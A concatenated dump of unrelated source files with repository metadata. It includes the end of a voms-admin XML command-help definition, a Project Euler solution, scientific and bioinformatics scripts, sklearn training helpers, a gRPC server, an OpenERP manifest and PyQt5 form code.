</command>
<command
name="dismiss-role">
<description>dismiss-role GROUPNAME ROLENAME USER
</description>
<help-string xml:space="preserve">
Dismiss role ROLENAME from user USER in group GROUPNAME.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="Group" />
<arg
type="Role" />
<arg
type="User" />
</command>
<command
name="list-users-with-role">
<description>list-users-with-role GROUPNAME ROLENAME
</description>
<help-string xml:space="preserve">
Lists all users with ROLENAME in GROUPNAME.</help-string>
<arg
type="Group" />
<arg
type="Role" />
</command>
<command
name="list-user-roles">
<description>list-user-roles USER</description>
<help-string xml:space="preserve">
Lists the roles that USER is assigned.
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.</help-string>
<arg
type="User" />
</command>
</command-group>
<command-group
name="Attribute class management commands"
shortname="attr-class">
<command
name="create-attribute-class">
<description> create-attribute-class CLASSNAME DESCRIPTION UNIQUE
</description>
<help-string xml:space="preserve">
Creates a new generic attribute class named CLASSNAME, with
description DESCRIPTION.
UNIQUE is a boolean argument. If UNIQUE is true,
attribute values assigned to users for this class are checked for
uniqueness. Otherwise no checks are performed on user attribute values.
</help-string>
<arg
type="String" />
<arg
type="String"
nillable="true" />
<arg
type="Boolean"
nillable="true" />
</command>
<command
name="delete-attribute-class">
<description>delete-attribute-class CLASSNAME
</description>
<help-string xml:space="preserve">
Removes the generic attribute class CLASSNAME. All the
user, group and role attribute mappings will be deleted as well.
</help-string>
<arg
type="String" />
</command>
<command
name="list-attribute-classes">
<description>list-attribute-classes</description>
<help-string xml:space="preserve">
Lists the attribute classes defined for the VO.</help-string>
</command>
</command-group>
<command-group
name="Generic attribute assignment commands"
shortname="attrs">
<command
name="set-user-attribute">
<description> set-user-attribute USER ATTRIBUTE ATTRIBUTE_VALUE
</description>
<help-string xml:space="preserve">
Sets the generic attribute ATTRIBUTE value to
ATTRIBUTE_VALUE for user USER. USER is either an X509 certificate file
in PEM format, or a DN, CA couple when the --nousercert option is set.
</help-string>
<arg
type="User" />
<arg
type="String" />
<arg
type="String" />
</command>
<command
name="delete-user-attribute">
<description>delete-user-attribute USER ATTRIBUTE
</description>
<help-string xml:space="preserve">
Deletes the generic attribute ATTRIBUTE value from user
USER. USER is either an X509 certificate file in PEM format, or a DN,
CA couple when the --nousercert option is set.</help-string>
<arg
type="User" />
<arg
type="String" />
</command>
<command
name="list-user-attributes">
<description>list-user-attributes USER</description>
<help-string xml:space="preserve">
Lists the generic attributes defined for user USER. USER is
either an X509 certificate file in PEM format, or a DN, CA couple when
the --nousercert option is set.</help-string>
<arg
type="User" />
</command>
<command
name="set-group-attribute">
<description> set-group-attribute GROUP ATTRIBUTE ATTRIBUTE_VALUE
</description>
<help-string xml:space="preserve">
Sets the generic attribute ATTRIBUTE value to
ATTRIBUTE_VALUE for group GROUP.</help-string>
<arg
type="Group" />
<arg
type="String" />
<arg
type="String" />
</command>
<command
name="set-role-attribute">
<description> set-role-attribute GROUP ROLE ATTRIBUTE ATTRIBUTE_VALUE
</description>
<help-string xml:space="preserve">
Sets the generic attribute ATTRIBUTE value to
ATTRIBUTE_VALUE for role ROLE in group GROUP.</help-string>
<arg
type="Group" />
<arg
type="Role" />
<arg
type="String" />
<arg
type="String" />
</command>
<command
name="delete-group-attribute">
<description>delete-group-attribute GROUP ATTRIBUTE
</description>
<help-string xml:space="preserve">
Deletes the generic attribute ATTRIBUTE value from group
GROUP.</help-string>
<arg
type="Group" />
<arg
type="String" />
</command>
<command
name="list-group-attributes">
<description>list-group-attributes GROUP
</description>
<help-string xml:space="preserve">
Lists the generic attributes defined for group GROUP.</help-string>
<arg
type="Group" />
</command>
<command
name="list-role-attributes">
<description>list-role-attributes GROUP ROLE
</description>
<help-string xml:space="preserve">
Lists the generic attributes defined for role ROLE in group
GROUP.</help-string>
<arg
type="Group" />
<arg
type="Role" />
</command>
<command
name="delete-role-attribute">
<description> delete-role-attribute GROUP ROLE ATTRIBUTE</description>
<help-string xml:space="preserve">
Deletes the generic attribute ATTRIBUTE value from role
ROLE in group GROUP.</help-string>
<arg
type="Group" />
<arg
type="Role" />
<arg
type="String" />
</command>
</command-group>
<command-group
name="ACL management commands"
shortname="acl">
<command
name="get-ACL">
<description>get-ACL CONTEXT</description>
<help-string xml:space="preserve">
Gets the ACL defined for voms context CONTEXT. CONTEXT may
be either a group (e.g. /groupname ) or a qualified role
(e.g./groupname/Role=VO-Admin).</help-string>
<arg
type="String" />
</command>
<command
name="get-default-ACL">
<description>get-default-ACL GROUP</description>
<help-string xml:space="preserve">
Gets the default ACL defined for group GROUP.</help-string>
<arg
type="Group" />
</command>
<command
name="add-ACL-entry">
<description> add-ACL-entry CONTEXT USER PERMISSION PROPAGATE
</description>
<help-string xml:space="preserve">
Adds an entry to the ACL for CONTEXT assigning PERMISSION
to user/admin USER. If PROPAGATE is true, the entry is
propagated to children contexts.
CONTEXT may be either a group (e.g. /groupname ) or
a qualified role (e.g./groupname/Role=VO-Admin).
USER is either an X509 certificate file in PEM format,
or a DN, CA couple when the --nousercert option is set.
PERMISSION is a VOMS permission expressed using the
VOMS-Admin 2.x format. Allowed permission values are:
ALL
CONTAINER_READ CONTAINER_WRITE
MEMBERSHIP_READ MEMBERSHIP_WRITE
ATTRIBUTES_READ ATTRIBUTES_WRITE
ACL_READ ACL_WRITE ACL_DEFAULT
REQUESTS_READ REQUESTS_WRITE
PERSONAL_INFO_READ PERSONAL_INFO_WRITE
SUSPEND
Multiple permissions can be assigned by combining them
in a comma separated list, e.g.:
"CONTAINER_READ,MEMBERSHIP_READ"
Special meaning DN,CA couples (to be used with
the --nousercert option set) are listed hereafter:
If DN is ANYONE and CA is VOMS_CA, an entry will be created
that assigns the specified PERMISSION to to any
authenticated user (i.e., any client that authenticates
with a certificates signed by a trusted CA).
if CA is GROUP_CA, DN is interpreted as a group and entry
will be assigned to members of such group.
if CA is ROLE_CA, DN is interpreted as a qualified role
(i.e., /test_vo/Role=TestRole), the entry will be assigned
to VO members that have the given role in the given group.
Examples:
voms-admin --vo test_vo add-ACL-entry /test_vo \\
.globus/usercert.pem ALL true
(The above command grants full rights to the user identified by
'.globus/usercert.pem' on the whole VO, since PROPAGATE is true)
voms-admin --nousercert --vo test_vo add-ACL-entry /test_vo \\
'ANYONE' 'VOMS_CA' 'CONTAINER_READ,MEMBERSHIP_READ' true
(The above command grants READ rights on VO structure and membership
to any authenticated user on the whole VO, since PROPAGATE is true)
To get more detailed information about Voms admin AuthZ
framework, either consult the voms-admin user's guide
or type:
voms-admin --help-acl</help-string>
<arg
type="String" />
<arg
type="User" />
<arg
type="Permission" />
<arg
type="Boolean" />
</command>
<command
name="add-default-ACL-entry">
<description> add-default-ACL-entry GROUP USER PERMISSION</description>
<help-string xml:space="preserve">
Adds an entry to the default ACL for GROUP assigning
PERMISSION to user/admin USER.
USER is either an X509 certificate file
in PEM format, or a DN, CA couple when the --nousercert option is set.
PERMISSION is a VOMS permission expressed using the VOMS-Admin 2.x
format.
Allowed permission values are:
ALL
CONTAINER_READ CONTAINER_WRITE
MEMBERSHIP_READ MEMBERSHIP_WRITE
ATTRIBUTES_READ ATTRIBUTES_WRITE
ACL_READ ACL_WRITE ACL_DEFAULT
REQUESTS_READ REQUESTS_WRITE
PERSONAL_INFO_READ PERSONAL_INFO_WRITE
SUSPEND
Multiple permissions can be assigned by combining them
in a comma separated list, e.g.:
"CONTAINER_READ,MEMBERSHIP_READ"
Special meaning DN,CA couples are listed hereafter:
If DN is ANYONE and CA is VOMS_CA, an entry will be created that
assigns the specified PERMISSION to to any authenticated user (i.e.,
any client that authenticates with a certificates signed by
a trusted CA).
if CA is GROUP_CA, DN is interpreted as a group and entry will be
assigned to members of such group.
if CA is ROLE_CA, DN is interpreted as a qualified role
(i.e., /test_vo/Role=TestRole), the entry will be assigned to VO
members that have the given role in the given group.
To get more detailed information about Voms admin AuthZ framework,
either consult the voms-admin user's guide or type:
voms-admin --help-acl</help-string>
<arg
type="Group" />
<arg
type="User" />
<arg
type="Permission" />
</command>
<command
name="remove-ACL-entry">
<description>remove-ACL-entry CONTEXT USER PROPAGATE
</description>
<help-string xml:space="preserve">
Removes the entry from the ACL for CONTEXT for user/admin USER.
If PROPAGATE is true, the entry is removed also from children
contexts.
CONTEXT may be either a group (e.g. /groupname ) or a
qualified role (e.g./groupname/Role=VO-Admin).
USER is either an X509 certificate file
in PEM format, or a DN, CA couple when the --nousercert option is set.
Special meaning DN,CA couples are listed hereafter:
If DN is ANYONE and CA is VOMS_CA, an entry will be created that
assigns the specified PERMISSION to to any authenticated user (i.e.,
any client that authenticates with a certificates signed by
a trusted CA).
if CA is GROUP_CA, DN is interpreted as a group and entry will be
assigned to members of such group.
if CA is ROLE_CA, DN is interpreted as a qualified role
(i.e., /test_vo/Role=TestRole), the entry will be assigned to VO
members that have the given role in the given group.
Examples:
voms-admin --nousercert --vo test_vo remove-ACL-entry \\
/test_vo 'ANYONE' 'VOMS_CA' true
(The above command removes any right on the VO from any authenticated
user)
To get more detailed information about Voms admin AuthZ framework,
either consult the voms-admin user's guide or type:
voms-admin --help-acl</help-string>
<arg
type="String" />
<arg
type="User" />
<arg
type="Boolean" />
</command>
<command
name="remove-default-ACL-entry">
<description>remove-default-ACL-entry GROUP USER
</description>
<help-string xml:space="preserve">
Removes the entry for user/admin USER from the default ACL
for GROUP.
USER is either an X509 certificate file in PEM format, or a DN,
CA couple when the --nousercert option is set.
Special meaning DN,CA couples are listed hereafter:
If DN is ANYONE and CA is VOMS_CA, an entry will be created that
assigns the specified PERMISSION to to any authenticated user (i.e.,
any client that authenticates with a certificates signed by
a trusted CA).
if CA is GROUP_CA, DN is interpreted as a group and entry will be
assigned to members of such group.
if CA is ROLE_CA, DN is interpreted as a qualified role
(i.e., /test_vo/Role=TestRole), the entry will be assigned to VO
members that have the given role in the given group.
To get more detailed information about Voms admin AuthZ framework,
either consult the voms-admin user's guide or type:
voms-admin --help-acl</help-string>
<arg
type="Group" />
<arg
type="User" />
</command>
</command-group>
<command-group
name="Other commands"
shortname="other">
<command
name="get-vo-name">
<description>get-vo-name</description>
<help-string xml:space="preserve">
This command returns the name of the contacted vo.</help-string>
</command>
<command
name="list-cas">
<description>list-cas</description>
<help-string xml:space="preserve">
Lists the certificate authorities accepted by the VO.</help-string>
</command>
</command-group>
<command-group
name="Certificate management commands"
shortname="Certificate"
>
<command
name="add-certificate">
<description>add-certificate USER CERT</description>
<help-string xml:space="preserve">
Binds a certificate to an existing VO user.
This operation may take either two pem certficate files as argument, or,
if the --nousercert option is set, two DN CA couples.
Example:
voms-admin --vo infngrid add-certificate my-cert.pem my-other-cert.pem
voms-admin --vo infngrid --nousercert add-certificate \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA' \\
'/C=IT/ST=Test/CN=user0/Email=andrea.ceccanti@cnaf.infn.it' '/C=IT/ST=Test/L=Bologna/O=Voms-Admin/OU=Voms-Admin testing/CN=Test CA'
</help-string>
<arg type="User"/>
<arg type="User"/>
</command>
<command
name="remove-certificate">
<description>remove-certificate USER</description>
<help-string xml:space="preserve">
Unbinds a certificate from an existing VO user.
This operation takes either a pem certificate as argument, or,
if the --nousercert option is set, a DN CA couple.
Example:
voms-admin --vo infngrid remove-certificate my-cert.pem
voms-admin --vo infngrid --nousercert remove-certificate \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA'
</help-string>
<arg type="User"/>
</command>
<command
name="suspend-certificate">
<description>suspend-certificate USER REASON</description>
<help-string xml:space="preserve">
Suspends a user certificate, and specifies a reason for the suspension.
This operation takes, for the first argument, either a pem certificate as argument, or,
if the --nousercert option is set, a DN CA couple.
Example:
voms-admin --vo infngrid suspend-certificate usercert.pem 'Security incident!'
voms-admin --vo infngrid --nousercert suspend-certificate \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA' \\
'Security incident!'
</help-string>
<arg type="User"/>
<arg type="String"/>
</command>
<command
name="restore-certificate">
<description>restore-certificate USER</description>
<help-string xml:space="preserve">
Restores a user certificate.
This operation takes, for the first argument, either a pem certificate as argument, or,
if the --nousercert option is set, a DN CA couple.
Example:
voms-admin --vo infngrid restore-certificate usercert.pem
voms-admin --vo infngrid --nousercert restore-certificate \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA'
</help-string>
<arg type="User"/>
</command>
<command
name="get-certificates">
<description>get-certificates USER</description>
<help-string xml:space="preserve">
Lists the certificates associated to a user.
This operation takes either a pem certificate as argument, or, if the --nousercert option is set, a DN CA couple.
Example:
voms-admin --vo infngrid get-certificates usercert.pem
voms-admin --vo infngrid --nousercert get-certificates \\
'/C=IT/O=INFN/OU=Personal Certificate/L=CNAF/CN=Andrea Ceccanti' '/C=IT/O=INFN/CN=INFN CA'
</help-string>
<arg
type="User"/>
</command>
</command-group>
</voms-commands>""" | [
"andrea.ceccanti@cnaf.infn.it"
] | andrea.ceccanti@cnaf.infn.it |
c3b059e438f71cbc363cd9ce306bf96bc1084330 | 13897046cd98718d039fdad235d57683b7a4ee5c | /P022.py | 1bddffd44b2bbbe020ebc953bea542108abd9d4e | [] | no_license | sana-malik/ProjectEuler | 1cb7431337bd623b5f5db2b8f17eccc1509a3659 | 3ee2ff258c75c9dbe6ae17b3032fa6c2b3d7e304 | refs/heads/master | 2020-04-22T17:11:23.757241 | 2012-12-14T00:41:04 | 2012-12-14T00:41:04 | 7,157,851 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 309 | py | #! /usr/bin/python
def score(name):
    """Alphabetical value of *name*: sum of letter positions, A=1 ... Z=26."""
    return sum(ord(letter) - ord('A') + 1 for letter in name)
file = open('names.txt')
names = sorted(file.read().replace('"','').split(','))
file.close()
totalScore = 0
for i, name in enumerate(names):
totalScore += (i+1)*score(name)
print totalScore
print 938*score('COLIN') | [
"heyletsdance@gmail.com"
] | heyletsdance@gmail.com |
94f8e95745e1bf0135136f7bd87f20138e0cd719 | a05a42885c54d19456d0bc296836253eed9ab6ad | /errRobust/prep.py | d2993d18b9226be60be3688e4a3bbcbe6eb4c26a | [] | no_license | congzlwag/BornMachineTomo | b26d9cf4f90b1d015992864db05e14ff59479254 | 64b3286f5453763216b860f89961900269b8caff | refs/heads/master | 2022-03-29T15:03:49.176583 | 2020-01-05T21:02:12 | 2020-01-05T21:02:12 | 134,438,390 | 4 | 1 | null | null | null | null | UTF-8 | Python | false | false | 651 | py | from mpi4py import MPI
import sys
sys.path.append('../')
from CS6 import ProjMeasureSet, MPS
import numpy as np
import os
measout_dir = './'
if __name__ == '__main__':
    # CLI: argv[1] = MPS type string, argv[2] = number of sites.
    typ = sys.argv[1]
    space_size = int(sys.argv[2])
    # BUG FIX: the noise levels were read with a bare `load(...)`, which is
    # not defined anywhere in this module; numpy's loader is what is meant.
    nss = np.load('elist.npy')
    comm = MPI.COMM_WORLD
    rk = comm.Get_rank()
    # Seed per MPI rank so each rank draws an independent measurement set.
    np.random.seed(rk)
    mxBatch = 2000
    batch_size = 40
    sm = MPS(space_size, typ)
    sm.leftCano()
    for ns in nss:
        ds = ProjMeasureSet(space_size, mxBatch*batch_size, mps=sm, noise=ns)
        # Output layout: ./<type>/<space_size>/<noise>/R<rank>Set
        measout = './%s/%d/%g/'%(typ, space_size, ns)
        try:
            os.makedirs(measout)
        except FileExistsError:
            # Another rank may have created the directory first; that's fine.
            pass
        ds.save(measout+"R%dSet"%rk)
| [
"congzlwag@163.com"
] | congzlwag@163.com |
ceb2238237480ba980b5de0c949bd5db65cf0aef | eb348caf75cad81f9be41b73e9fe44f81ea75b7a | /app/server.py | 24b57f899bd62d9b887e439506937d992a644fdf | [] | no_license | MertIV/gpu_price | e0cc113678e70629154eccab24ddcd4a4aea016e | 031dd02a8c828a723745897cd19aac12d9ac4f00 | refs/heads/master | 2023-08-22T08:54:12.913696 | 2021-09-27T20:41:05 | 2021-09-27T20:41:05 | 408,991,696 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 412 | py | from concurrent import futures
import grpc
from app.generated import echo_pb2_grpc
from app.echoer import Echoer
class Server:
    """Minimal gRPC bootstrap: registers the Echoer servicer and serves forever."""

    @staticmethod
    def run():
        """Start an insecure gRPC server on port 50051 and block until shutdown."""
        thread_pool = futures.ThreadPoolExecutor(max_workers=10)
        grpc_server = grpc.server(thread_pool)
        echo_pb2_grpc.add_EchoServicer_to_server(Echoer(), grpc_server)
        grpc_server.add_insecure_port('[::]:50051')
        grpc_server.start()
        grpc_server.wait_for_termination()
| [
"mrtkrt96@gmail.com"
] | mrtkrt96@gmail.com |
7ea4348e0388b427adcc0d1d2c31b06df0550e19 | 023acc1445ebde3e9fe4318fcfd60908c91d74d5 | /sli/train.py | 77fdce51b077a71a4dc73a1c298f924c963fc9d0 | [] | no_license | counterfactuals/sensible-local-interpretations | 99d22df59a6f07b6135762eec57c29e80dac9cdf | ab7af07299ea2ec1a1be28e0bf38f4947321d04c | refs/heads/master | 2022-03-12T11:30:19.296104 | 2019-12-02T20:31:27 | 2019-12-02T20:31:27 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,828 | py | from copy import deepcopy
import numpy as np
from sklearn.neural_network import MLPClassifier, MLPRegressor
from sklearn.linear_model import LogisticRegression, LinearRegression
from sklearn.ensemble import RandomForestClassifier, RandomForestRegressor, GradientBoostingClassifier
from sklearn.tree import export_graphviz, DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.tree import plot_tree
from sampling import resample
def train_models(X: np.ndarray, y: np.ndarray,
                 class_weights: list=[0.5, 1.0, 2.0], model_type: str='logistic'):
    '''Train one binary classifier per positive-class weight.

    Params
    ------
    X, y
        Training features and binary labels.
    class_weights
        Weights to weight the positive class, one for each model to be trained
    model_type
        One of 'logistic', 'mlp2', 'rf', 'gb'.

    Returns
    -------
    list of fitted estimators, one per entry in ``class_weights``.
    '''
    assert np.unique(y).size == 2, 'Task must be binary classification!'
    models = []
    for class_weight in class_weights:
        # BUG FIX: the original reassigned X, y when resampling, so every
        # later class_weight resampled data that had already been resampled.
        # Use per-iteration locals that always start from the original data.
        X_fit, y_fit = X, y
        if model_type == 'logistic':
            m = LogisticRegression(solver='lbfgs', class_weight={0: 1, 1: class_weight})
        elif model_type == 'mlp2':
            # MLP has no class_weight parameter, so weight via oversampling.
            m = MLPClassifier()
            X_fit, y_fit = resample(X, y, sample_type='over', class_weight=class_weight)
        elif model_type == 'rf':
            m = RandomForestClassifier(class_weight={0: 1, 1: class_weight})
        elif model_type == 'gb':
            # Gradient boosting likewise lacks class_weight; oversample instead.
            m = GradientBoostingClassifier()
            X_fit, y_fit = resample(X, y, sample_type='over', class_weight=class_weight)
        m.fit(X_fit, y_fit)
        models.append(deepcopy(m))
    return models
def regress(X: np.ndarray, y: np.ndarray, model_type: str='linear'):
    '''Fit and return a regressor of the requested type on (X, y).

    Params
    ------
    model_type
        One of 'linear', 'mlp2', 'rf', 'gb'.
    '''
    if model_type == 'linear':
        m = LinearRegression()
    elif model_type == 'mlp2':
        m = MLPRegressor()
    elif model_type == 'rf':
        m = RandomForestRegressor()
    elif model_type == 'gb':
        # BUG FIX: only GradientBoostingClassifier is imported at module level,
        # so this branch raised NameError. Import the regressor locally.
        from sklearn.ensemble import GradientBoostingRegressor
        m = GradientBoostingRegressor()
    m.fit(X, y)
    return m
"chandan_singh@berkeley.edu"
] | chandan_singh@berkeley.edu |
56952f1c885d10b87a2294e359c3c70e9b306700 | c241e9d8c47913f49372f3070c928c947dc1b890 | /biobakery_workflows/scripts/extract_orphan_reads.py | 4f288d34469d9ab13c0f56c20f2f5689165d797d | [
"MIT"
] | permissive | shbrief/biobakery_workflows | b29b311b1a484aee039ea3f36a3852378e86aeeb | 2037f45caa8e4af9a40b5c1d2886cde15bc00381 | refs/heads/master | 2023-01-02T11:53:23.006687 | 2020-10-26T14:07:35 | 2020-10-26T14:07:35 | 291,796,194 | 0 | 0 | NOASSERTION | 2020-08-31T18:40:41 | 2020-08-31T18:40:41 | null | UTF-8 | Python | false | false | 3,207 | py | #!/usr/bin/env python
# Given a raw interleaved fastq file and a balanced interleaved fastq (containing no orpahns)
# generate the read ID lists necessary to extract all orphans from the original file.
#
# Makes use of the seqtk utility
import argparse
import os
import subprocess
def parse_cli_arguments():
    """Parse command-line arguments.

    Returns
    -------
    argparse.Namespace with ``raw_sequence``, ``balanced_sequence`` and
    ``output_dir`` attributes (all required options).
    """
    # BUG FIX: the long help text was passed positionally, which argparse
    # interprets as `prog` (the program name shown in usage lines), not the
    # description. Pass it as description= explicitly.
    parser = argparse.ArgumentParser(
        description='Extracts orphan reads from a interleaved sequence file '
                    'and produces an orphan sequence file.')
    parser.add_argument('-r', '--raw-sequence', required=True,
                        help='The raw interleaved sequence file.')
    parser.add_argument('-b', '--balanced-sequence', required=True,
                        help='Balanced sequence file with no orphan sequences.')
    parser.add_argument('-o', '--output-dir', required=True,
                        help='Output directory to write orphan sequence files too.')
    return parser.parse_args()
def get_ids_from_sequences(sample_name, raw_seq, balanced_seq, out_dir):
    """
    Extracts raw, balanced and orphan sequence IDs from the provided
    sequence files.

    Writes three sorted ID files under out_dir and returns their paths as
    the tuple (raw_ids, balanced_ids, orphan_ids). Relies on the external
    `grep`, `sed`, `sort` and `comm` utilities being on PATH.
    """
    raw_ids = os.path.join(out_dir, "%s.raw_ids.txt" % sample_name)
    balanced_ids = os.path.join(out_dir, "%s.matched_ids.txt" % sample_name)
    orphan_ids = os.path.join(out_dir, "%s.orphan_ids.txt" % sample_name)
    # Shell-style pipeline: grep read headers ("@.../1" or "@.../2"),
    # strip the leading '@' with sed, and sort (comm requires sorted input).
    for (input_seq, output_ids) in [(raw_seq, raw_ids), (balanced_seq, balanced_ids)]:
        with open(output_ids, 'wb') as out_ids:
            ps_grep = subprocess.Popen(['grep', '-e', '^@.*/[1|2]$', input_seq], stdout=subprocess.PIPE)
            ps_sed = subprocess.Popen(['sed', '-e', 's/^@//'], stdin=ps_grep.stdout, stdout=subprocess.PIPE)
            # Close our copy of grep's stdout so grep gets SIGPIPE if sed exits.
            ps_grep.stdout.close()
            ps_sort = subprocess.Popen(['sort'], stdin=ps_sed.stdout, stdout=out_ids)
            ps_sed.stdout.close()
            ps_sort.communicate()
    # comm -23: lines unique to the raw ID list, i.e. reads whose mate is
    # missing from the balanced file -- the orphans.
    with open(orphan_ids, 'wb') as orphan_ids_out:
        p = subprocess.Popen(['comm', '-23', raw_ids, balanced_ids], stdout=orphan_ids_out)
        p.communicate()
    return (raw_ids, balanced_ids, orphan_ids)
def generate_orphan_sequences(sample_name, raw_seqs, orphan_ids, out_dir):
    """
    Generates an orphan sequence file from the supplied interleaved sequence file.

    Extracts the reads listed in `orphan_ids` from `raw_seqs` using the
    external `seqtk subseq` utility and writes them to
    <out_dir>/<sample_name>_orphans.fastq.
    """
    orphan_seqs_file = os.path.join(out_dir, "%s_orphans.fastq" % sample_name)
    with open(orphan_seqs_file, 'wb') as orphan_seqs:
        # seqtk subseq <fastq> <id-list> prints the matching records to stdout.
        p = subprocess.Popen(['seqtk', 'subseq', raw_seqs, orphan_ids], stdout=orphan_seqs)
        p.communicate()
def main(args):
    """Drive the pipeline: derive the sample name, build the ID lists,
    write the orphan FASTQ, then delete the intermediate ID files."""
    # Sample name = raw file basename up to the first extension separator.
    sample_name = os.path.basename(args.raw_sequence).split(os.extsep, 1)[0]
    (raw_ids, balanced_ids, orphan_ids) = get_ids_from_sequences(sample_name,
                                                                 args.raw_sequence,
                                                                 args.balanced_sequence,
                                                                 args.output_dir)
    generate_orphan_sequences(sample_name, args.raw_sequence, orphan_ids, args.output_dir)
    # The ID lists are scratch files; only the orphan FASTQ is kept.
    os.remove(raw_ids)
    os.remove(balanced_ids)
    os.remove(orphan_ids)
# Script entry point.
if __name__ == "__main__":
    main(parse_cli_arguments())
| [
"437074+carze@users.noreply.github.com"
] | 437074+carze@users.noreply.github.com |
2614cf22a662a20980fc2c5a1e7cfee9b8c8d154 | f6ff3146b8058e213155d5903eb793d2a1c1ec97 | /virtual/bin/wheel | e0236dc65639bacd883c3a627892db671def4745 | [
"MIT"
] | permissive | Bernicetwili/Personal-Gallery | c8695e54ee801768bebd071fa8d29b07f87c7984 | 15f5e018cee67abe97d47604137470ce205961fb | refs/heads/master | 2023-04-21T18:41:07.063828 | 2021-05-20T18:40:17 | 2021-05-20T18:40:17 | 368,862,996 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 255 | #!/home/moringaschool/Desktop/Personal-Gallery/virtual/bin/python
# -*- coding: utf-8 -*-
import re
import sys
from wheel.cli import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"bernicetwili0@gmail.com"
] | bernicetwili0@gmail.com | |
aad2618c35e6a18f8a73c82f034e86cb71cf7e0a | c1ddae2b80a644162032971fe7b46c42eefcf8a2 | /evalunl/__openerp__.py | 62a52832ce6a173e464f7bbf08881414e48d2945 | [] | no_license | miltonlab/curso-openerp | f5e0daff2eff79e7cf46051bf0b89a31509c9b68 | 8408c02b3b6533f0ec74077b9f2d91e6ef90afe2 | refs/heads/master | 2016-09-01T18:04:31.995959 | 2013-05-09T05:09:57 | 2013-05-09T05:09:57 | 9,855,085 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 307 | py | {
'name' : 'evaluacionunl2013',
'version' : '1.0',
'author' : 'DDS-UNL',
'decription' : 'Presentacion de Indicadores para Evaluacion 2013',
'category' : 'Frontal',
'website' : 'http://dds.unl.edu.ec',
'depends' : ['base'],
'data' : [ ],
'demo' : ['demo', 'demo.xml']
}
| [
"miltonlab@ubuntuserver.(none)"
] | miltonlab@ubuntuserver.(none) |
d7ebd8e83312c140e3e17d3997dc25a05d8fc343 | 23ec5dc502e0437c6a23aa783e01f7a9d32f5df0 | /magicwand/AI/AI_form0225/gui/form.py | dec81337e09b40d39eca8a193dd6cf940ba3b768 | [] | no_license | jinu0124/AI_Learning_Tool | 1a33b9a99ca0518af11c77b94c3a8d63b9aa88c2 | 91ba9b2eda4b82db35ed8b50d4b1468e23a3d993 | refs/heads/master | 2023-04-03T09:57:00.737744 | 2020-02-25T23:57:12 | 2020-02-25T23:57:12 | 242,937,653 | 0 | 0 | null | 2023-03-24T22:17:04 | 2020-02-25T07:30:38 | Jupyter Notebook | UTF-8 | Python | false | false | 24,617 | py | from PyQt5 import QtCore, QtWidgets
class Ui_Validation(object):
    """Qt-Designer-style UI builder for the validation panel: four action
    buttons, a status label and a list widget for progress messages.
    Widgets are positioned with absolute geometry (no layouts)."""
    # validation Check
    def setupUi(self, Form):
        """Create and place all widgets on *Form*, then wire signals."""
        Form.setObjectName("Form")
        Form.resize(447, 136)
        self.pushButton_3 = QtWidgets.QPushButton(Form)
        self.pushButton_3.setGeometry(QtCore.QRect(390, 20, 81, 23))
        self.pushButton_3.setObjectName("pushButton_3")
        self.pushButton_2 = QtWidgets.QPushButton(Form)
        self.pushButton_2.setGeometry(QtCore.QRect(315, 20, 71, 23))
        self.pushButton_2.setObjectName("pushButton_2")
        self.pushButton_1 = QtWidgets.QPushButton(Form)
        self.pushButton_1.setGeometry(QtCore.QRect(235, 20, 76, 23))
        self.pushButton_1.setObjectName("pushButton_1")
        self.pushButton_0 = QtWidgets.QPushButton(Form)
        self.pushButton_0.setGeometry(QtCore.QRect(155, 20, 76, 23))
        self.pushButton_0.setObjectName("pushButton_0")
        self.label_8 = QtWidgets.QLabel(Form)
        self.label_8.setGeometry(QtCore.QRect(30, 20, 125, 21))
        self.label_8.setObjectName("label_8")
        self.listWidget_8 = QtWidgets.QListWidget(Form)
        self.listWidget_8.setGeometry(QtCore.QRect(20, 50, 450, 125))
        # NOTE(review): objectName "listView_4" does not match the attribute
        # name listWidget_8 -- looks like a copy/paste leftover; confirm no
        # findChild() lookup depends on it before renaming.
        self.listWidget_8.setObjectName("listView_4")
        self.retranslateUi(Form)
        QtCore.QMetaObject.connectSlotsByName(Form)
    def retranslateUi(self, Form):
        """Set window title, stylesheet and all user-visible strings."""
        _translate = QtCore.QCoreApplication.translate
        Form.setWindowTitle(_translate("Form", "Form"))
        Form.setStyleSheet('font-family : Arial')
        self.pushButton_3.setText(_translate("Form", "Val Start"))
        self.pushButton_2.setText(_translate("Form", "Val Config"))
        self.pushButton_1.setText(_translate("Form", "Load Weight"))
        self.pushButton_0.setText(_translate("Form", "Load Image"))
        self.label_8.setText(_translate("Form", "Validation Ready"))
class Ui_Val(object):
    """UI builder for the validation-configuration dialog: inference options
    (CPU/GPU, backbone, detection rate), class-label list with Add/Del,
    color-splash toggle and an OK/Cancel button box."""
    def setupUi(self, Dialog):
        """Create and place all widgets on *Dialog*, then wire signals."""
        Dialog.setObjectName("Dialog")
        Dialog.resize(341, 364)
        self.buttonBox = QtWidgets.QDialogButtonBox(Dialog)
        self.buttonBox.setGeometry(QtCore.QRect(80, 320, 171, 31))
        self.buttonBox.setOrientation(QtCore.Qt.Horizontal)
        self.buttonBox.setStandardButtons(QtWidgets.QDialogButtonBox.Cancel|QtWidgets.QDialogButtonBox.Ok)
        self.buttonBox.setObjectName("buttonBox")
        self.label = QtWidgets.QLabel(Dialog)
        self.label.setGeometry(QtCore.QRect(20, 20, 61, 21))
        self.label.setObjectName("label")
        self.label_2 = QtWidgets.QLabel(Dialog)
        self.label_2.setGeometry(QtCore.QRect(20, 60, 61, 21))
